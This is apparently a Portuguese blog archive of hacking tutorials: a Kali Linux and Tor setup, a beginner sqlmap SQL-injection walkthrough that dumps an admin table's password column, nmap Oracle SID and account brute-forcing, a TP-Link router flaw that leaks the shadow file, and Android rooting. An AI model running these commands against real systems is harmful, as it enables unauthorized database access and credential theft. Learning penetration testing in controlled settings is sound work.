Anúncios

Arquivo

Posts Tagged ‘hacker’

Tutorial: Instalando e fazendo as configurações iniciais do Kali Linux no Virtual Box


NOVOS TUTORIAIS AGORA EM http://www.infrasecurity.com.br/blog/?tag=kali-linux

 

Olá a todos

Gostaria de mostrar pra vocês como instalar e configurar o Kali Linux no Virtual Box bem como fazer as configurações iniciais que na minha opinião são indispensáveis.

O Kali Linux é uma evolução do Backtrack e pode ser baixado aqui http://www.kali.org, ele é mantido pela mesma empresa de segurança do Backtrack.

Algumas vantagens que vi no Kali é que ele é baseado em Debian e muitas ferramentas que davam algum problema no Backtrack, aqui até o momento funcionam sem problemas.

Vou mostrar como criar a máquina virtual, instalar o Kali, instalar o VBOX additions, TOR e também o EtherAPE que tinha no backtrack e não por padrão no Kali. Vamos lá?

1 – Criar a máquina virtual:

Vamos criar uma nova e atribuir um nome

ScreenHunter_07 Apr. 03 16.09

Aqui vamos atribuir a quantidade de memória RAM, no caso coloquei 1GB

ScreenHunter_08 Apr. 03 16.09

Vá avançando nas opções padrão até chegar no tamanho do disco, no caso, coloquei 50GB

ScreenHunter_11 Apr. 03 16.10

Antes de inicializar a máquina vá em configurações da VM e mude a placa de rede para Bridged Adapter, isso para que a VM possa acesar o próprio hardware da máquina física.

ScreenHunter_11 Apr. 03 16.11

Nesta opção selecione o CD-ROM e escolha o arquivo ISO do Kali Linux que foi baixado do site

ScreenHunter_12 Apr. 03 16.11

2 – Instalar o Kali Linux

Tudo feito corretamente, bastar iniciar a VM e a tela inicial será essa onde podemos escolher a opção “Graphical Install”

ScreenHunter_12 Apr. 03 16.12

Nesta tela e nas seguintes será possível configurar o idioma, teclado e fuso horário, faça as configurações conforme achar melhorScreenHunter_13 Apr. 03 16.12

Aqui podemos definir um hostname que desejarmos, e na próxima tela, pode ser colocado um sufixo, caso vc tenha um, ou pode deixar em branco mesmo

ScreenHunter_14 Apr. 03 16.14

Defina a senha do usuário Root

ScreenHunter_15 Apr. 03 16.15

Avançando até essa tela podemos usar a primeira opção para o particionamento do disco, a próxima tela é só avançar

ScreenHunter_16 Apr. 03 16.16

Nessa tela, podemos selecionar a primeira opção e avançar

ScreenHunter_18 Apr. 03 16.16

Podemos avançar, e na próxima tela selecionar “YES”

ScreenHunter_18 Apr. 03 16.17

Aguarde a instalação, e nessa, parte se você sua rede já configurada para fornecer um IP e com acesso a internet, vc pode selecionar a opção “Yes”.

ScreenHunter_19 Apr. 03 16.36

Caso tenha um proxy você pode configurar aqui ou simplesmente deixar em branco e avançar

ScreenHunter_20 Apr. 03 16.36

Selecione “Yes” e aguarde a conclusão da Instalação, Ao reiniciar é logar com usuário Root e a senha que vc configurou.

ScreenHunter_20 Apr. 03 16.44

3 – Configurações iniciais.

O primeiro passo é instalar o VBOX  Additions para isso faça o seguinte abra um terminal e digite:

apt-get update && apt-get install -y linux-headers-$(uname -r)

Aguarde a conclusão da instalação

Feito isso vá no Menu “Devices” do Virtual Box e clique em “Install Guest Additions”

ScreenHunter_20 Apr. 03 16.57

Quando for exibido essa tela, clique em cancelar

ScreenHunter_20 Apr. 03 17.00

Execute agora os seguintes comandos no terminal.

cp /media/cdrom0/VBoxLinuxAdditions.run /root/

chmod 755 /root/VBoxLinuxAdditions.run

./VBoxLinuxAdditions.run

Aguarde a conclusão da instalação e reinicie a VM

Após reiniciar, outra coisa que podemos configurar é o metasploit framework para isso faça o seguinte, abra um terminal e digite:

service postgresql start && service metasploit start

aguarde a conclusão e depois digite:

update-rc.d postgresql enable && update-rc.d metasploit enable

Para iniciar basta acessar conforme a imagem

metasploit-kali-metasploit-framework

Outra configuração inicial interessante de se fazer é a configuração do TOR para navegação anônima para isso vamos fazer o seguinte:

apt-get install tor tor-geoipdb polipo vidalia

Feito isso digite

mkdir /var/run/tor

chmod 700 /var/run/tor/

Vamos configurar o polipo para acessar através do tor para isso digite

vim /etc/polipo/config

Descomente as linhas

allowedClientes 127.0.0.1

socksParentProxy = “localhost:9050”

socksParentType = socks5

salve e saia do arquivo e digite

service tor restart

service polipo restart

Daí para navegar anônimo basta configurar no navegador o proxy http para 127.0.0.1 porta 8123 ou proxy socs5 para 127.0.0.1 porta 9050

Também pode ser usado para configurar em outras aplicações que suportem acesso via proxy

Para instalar o EtherApe basta digitar

apt-get install etherape

Aguarde a conclusão e ele vai estar disponível em Applications/Internet.

Espero que tenham gostado dessa dica e por gentileza não deixem de compartilhar

Até a próxima

Anúncios

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Dica para pentest: Descobrindo contas de usuário no Oracle com o Nmap


Olá a todos mais uma vez

Gostaria de passar hoje uma dica para quem for executar um pentest, ou apenas para aprendizado mesmo.

Com essa dica é possível obter informações como SID de um BD Oracle e também fazer o levantamento de contas de usuário disponíveis usando apenas o nmap.

basta fazer o seguinte:

Execute o comando: nmap –script oracle-sid-brute 192.168.0.12

O resultado será algo semelhante ao abaixo onde no nosso caso o SID é o ORCL

ScreenHunter_06 Mar. 11 13.22

 

Feito isso basta executar o próximo comando: nmap –script oracle-brute -p 1521 –script-args oracle-brute.sid=ORCL 192.168.0.12

ScreenHunter_06 Mar. 11 13.27

 

Com isso obtemos uma lista de contas disponíveis no servidor de banco de dados oracle.

Espero que tenham gostado da dica e não se esqueça de compartilhar

Abraços

Tutorial: Explorando vulnerabilidade em roteador tp-link


Olá

Gostaria de mostrar dessa vez uma vulnerabilidade encontrada nos roteadores TP-Link WR740N, WR740ND and WR2543ND

Essa vulnerabilidade permite a captura do conteúdo do arquivo shadow que contém as senhas de acesso ao roteador.

Para conseguir essa informação você pode usar o burp-suite disponível no backtrack, para isso abra a ferramenta, vá em repeater, digite o ip do alvo e clique em go. após isso vc pode editar a requisição conforme abaixo e clicar em go novamente o resultado será semelhante ao abaixo.

ScreenHunter_06 Mar. 11 18.40

Agora com um pouco mais de trabalho vc consegue consegue quebrar essa senha, mas aí é assunto pra outro post.

Espero que tenham gostado.

Não se esqueça de compartilhar.

Abraços

Tutorial: Como fazer root no Galaxy Nexus com Android 4.2.2


Olá a todos

Segue o passo a passo para fazer o root no Galaxy Nexus com a versão recém liberada do Android a 4.2.2

Segue os pré requisitos

1 – Android SDK com ADT Bundle configurado

Maiores informações sobre como deixar isso configurado siga esse procedimento aqui

http://developer.android.com/sdk/installing/bundle.html

2 – Drivers USB do Galaxy Nexus

Faça o download do Galaxy Nexus Toolkit no site do XDA-Developers. http://forum.xda-developers.com/showthread.php?t=1392310

Abra o Galaxy Nexus Toolkit e selecione, digitando o número, a opção que corresponde ao seu aparelho e versão do Android. No meu caso foi a 7.

O Primeiro passo é fazer a instalação dos drivers no PC para isso digite a opção 1 aguarde a instalação do driver e conecte o aparelho com o cabo USB

OBS: se vc já seguiu nossa dica anterior para o android 4.2.1 vc não precisa fazer o passo acima

3 – Backup de todos os seus dados nunca é demais

Eu fui corajoso aqui e fiz sem backup mesmo, não tive problemas, mas aí é por sua conta e risco.

Agora vamos lá

1 – Baixe o arquivo SuperSU v1.04 (UPDATE-SuperSU-v1.04.zip)

http://dl.dropbox.com/u/26229715/UPDATE-SuperSU-v1.04.zip

2 – Copie esse arquivo para o Galaxy nexus usando o cabo USB

3 – Desligue o Fone

4 – Baixe o arquivo recovery-clockwork-touch-6.0.2.3-maguro.img

http://dl.dropbox.com/u/26229715/recovery-clockwork-touch-6.0.2.3-maguro.img

Copie esse arquivo para \adt-bundle(OS-VERSION)\sdk\plataform-tools

5 – Inicie em Modo Fastboot/Bootloader. Para isso segure a tecla de volume down e pressione a tecla Power por alguns segundos até ligar.

6 – Abra um prompt de comando em \adt-bundle(OS-VERSION)\sdk\plataform-tools e execute o comando

fastboot flash recovery recovery-clockwork-touch-6.0.2.3-maguro.img

7 – Ainda em modo fastboot usando as teclas de volume selecione Recover

8 – Em ClockwordMod recovery selecione “install zip from SD CARD” selecione “choose zip from SD card” navegue até achar o arquivo UPDATE-SuperSU-v1.04.zip e instale ele.

Volte ao menu principal do ClockwordMod Recovery e selecione “reboot now”

Feito isso vc vai ter acesso root ao seu Galaxy Nexus.

Espero que tenham gostado e até a próxima

E não se esqueça de compartilhar também.

Abraço

%d blogueiros gostam disto: